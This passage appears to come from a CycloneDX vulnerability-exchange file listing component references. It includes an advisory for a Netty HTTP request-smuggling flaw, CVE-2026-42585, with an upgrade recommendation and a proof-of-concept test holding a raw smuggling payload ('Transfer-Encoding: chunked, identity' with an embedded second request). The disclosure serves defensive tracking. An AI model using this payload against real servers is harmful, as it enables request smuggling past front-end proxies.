          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-42585",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "description": "### Summary\nNetty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks.\n\n### Details\nNetty incorrectly marks a request as chunked when malformed \"Transfer-Encoding: chunked, identity\" is present.\nAccording to RFC https://datatracker.ietf.org/doc/html/rfc9112#name-message-body-length\n\n\"\nIf a Transfer-Encoding header field is present in a request and the chunked transfer coding is not the final encoding,\n the message body length cannot be determined reliably; the server MUST respond with the 400 (Bad Request)\n status code and then close the connection.\n\"\n\nA possible scenario is when Netty is behind a proxy that doesn't reject requests with \"Transfer-Encoding: chunked, identity\", but prefers \"Content-Length\" and forwards the content to Netty.\n\n### PoC\nThe test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a request body.\n\n```java\n@Test\n    public void test() {\n        String requestStr = \"POST / HTTP/1.1\\r\\n\" +\n                \"Host: localhost\\r\\n\" +\n                \"Transfer-Encoding: chunked, identity\\r\\n\" +\n                \"Content-Length: 48\\r\\n\" +\n                \"\\r\\n\" +\n                \"0\\r\\n\" +\n                \"\\r\\n\" +\n                \"GET /smuggled HTTP/1.1\\r\\n\" +\n                \"Host: localhost\\r\\n\" +\n                \"\\r\\n\";\n\n        EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());\n        assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));\n\n        // Request 1\n        HttpRequest request = channel.readInbound();\n        assertTrue(request.decoderResult().isSuccess());\n        assertTrue(request.headers().contains(\"Transfer-Encoding\"));\n        assertFalse(request.headers().contains(\"Content-Length\"));\n        LastHttpContent last = channel.readInbound();\n        
assertTrue(last.decoderResult().isSuccess());\n        last.release();\n\n        // Request 2\n        request = channel.readInbound();\n        assertTrue(request.decoderResult().isSuccess());\n        last = channel.readInbound();\n        assertTrue(last.decoderResult().isSuccess());\n        last.release();\n    }\n```\n\n### Impact\nHTTP Request Smuggling: Attacker injects arbitrary HTTP requests",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.13.Final or 4.1.133.Final; the affected 4.1.130.Final is on the 4.1.x line, so 4.1.133.Final is the fix on the same line",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42585"
        },
        {
          "url": "https://datatracker.ietf.org/doc/html/rfc9112#name-message-body-length"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv"
        }
      ],
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4d7ce0b3-39fe-493c-bc80-99876475919a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#2e288e32-c573-4f1a-9eca-dd0e589291ca"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#47f1a52d-2d54-4870-a4c6-d6be0e3edd23"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
